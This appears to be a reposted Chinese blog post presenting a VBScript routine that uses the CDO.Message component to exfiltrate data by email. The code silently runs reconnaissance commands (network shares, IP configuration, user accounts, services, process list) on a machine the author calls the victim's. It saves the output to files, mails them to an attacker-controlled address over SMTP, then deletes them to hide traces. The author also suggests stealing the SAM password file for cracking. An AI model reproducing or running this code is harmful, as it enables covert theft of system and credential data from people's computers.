zoukankan      html  css  js  c++  java
  • vbs之邮箱的另类利用

    大家好啊,又见面啦,会不会想起我啦?我可是很想大家的
    写vb脚本也写啦几篇啦,不知道大家有收获没拉
    我还是希望大家学到多多的东西啦
    这篇带来的是关于cdo.message组建的利用的,目的是为了上传文件啦,嘿嘿ie,看来我说啦很多废话
    具体的功能还是看下面代码的分析吧!
    sub send_email(myaccount,mypassword,toemail,emailtopic,emailbody,emailattach)     '自定义一个过程括号里面的是形参
    dim cmdnum,i                                                                                                                   '初始化两个变量
    set objshell=createobject("wscript.shell")
    set email=createobject("cdo.message")
    cmdnum=array("net share","ipconfig /all","net user","net start","tasklist /svc")  '定义一个数组,里面的元素即为要收集的东西
    for i=0 to 4                                                                                                            '循环,数组的下标是从0开始,因此只能为4
    objshell.run("cmd /c "&cmdnum(i)&">>c:\"&i&".txt"),vbhide                                  '执行相应命令,并把结果存放到指定的文件里
    emailattach="c:\"&i&".txt"                                             
    youid=split(myaccount,"@",-1,1)                                                                      '以@为分界符把变量myaccount分割掉,分别存储在youid数组里
    ms_space="http://schemas.microsoft.com/cdo/configuration/"                  '此地方不要修改,没什么问题(说白啦我也不知道这里为什么要这样)
    email.from=myaccount                                           '定义邮件从哪里发送
    email.to=toemail                                                    '定义目标地址
    email.subject=emailtopic                                        '定义邮件主题
    email.textbody=emailbody                                   '定义主体内容
    with email.configuration.fields                               'with用在这里是省掉没必要的操作
    .item(ms_space&"sending")=2                                '发信端口
    .item(ms_space&"smtpserver")="smtp."&youid(1)         '定义邮箱发送服务器
    .item(ms_space&"smtpserverport")=25                        '定义smtp服务器端口
    .item(ms_space&"smtpauthenticate")=1                       '应该是组件cdo的一个认证方式
    .item(ms_space&"sendusername")=youid(0)                     
    .item(ms_space&"sendpassword")=mypassword
    .update                                                   
    end with
    if emailattach <> "" then                                        '如果附件不为空
    email.addattachment emailattach                            '为邮件添加附件
    end if  
    email.send  
    set email=nothing  
    if err then                                               '如果发信不成功
    err.clear                                                  '清除错误提示
    end if   
    objshell.run("cmd /c del "&emailattach),vbhide                           
    next
    end sub

    代码处你也可以自行修改发挥,比如上传受害者电脑里的sam文件啦,然后跑lcx,来个暴力破解
    其实这篇文章叫邮箱的另类利用,我心里实属还有点内疚,因为这根本就算不上什么另类啦
    高手见啦,肯定不户瞟一眼的
    哎,实属我技术那个菜啦...........
  • 相关阅读:
    Nginx IP限制
    Hadoop 基本原理
    Redis 主从复制原理
    ThreadLoacl 小记
    Spring boot @Transaction,@Async在同一个类中注解失效的原因和解决办法
    Kafka学习
    Spring BeanUtils简单使用
    精彩的解释CAP理论的文章
    tcp粘包,udp丢包
    java多线程
  • 原文地址:https://www.cnblogs.com/top5/p/1604678.html
Copyright © 2011-2022 走看看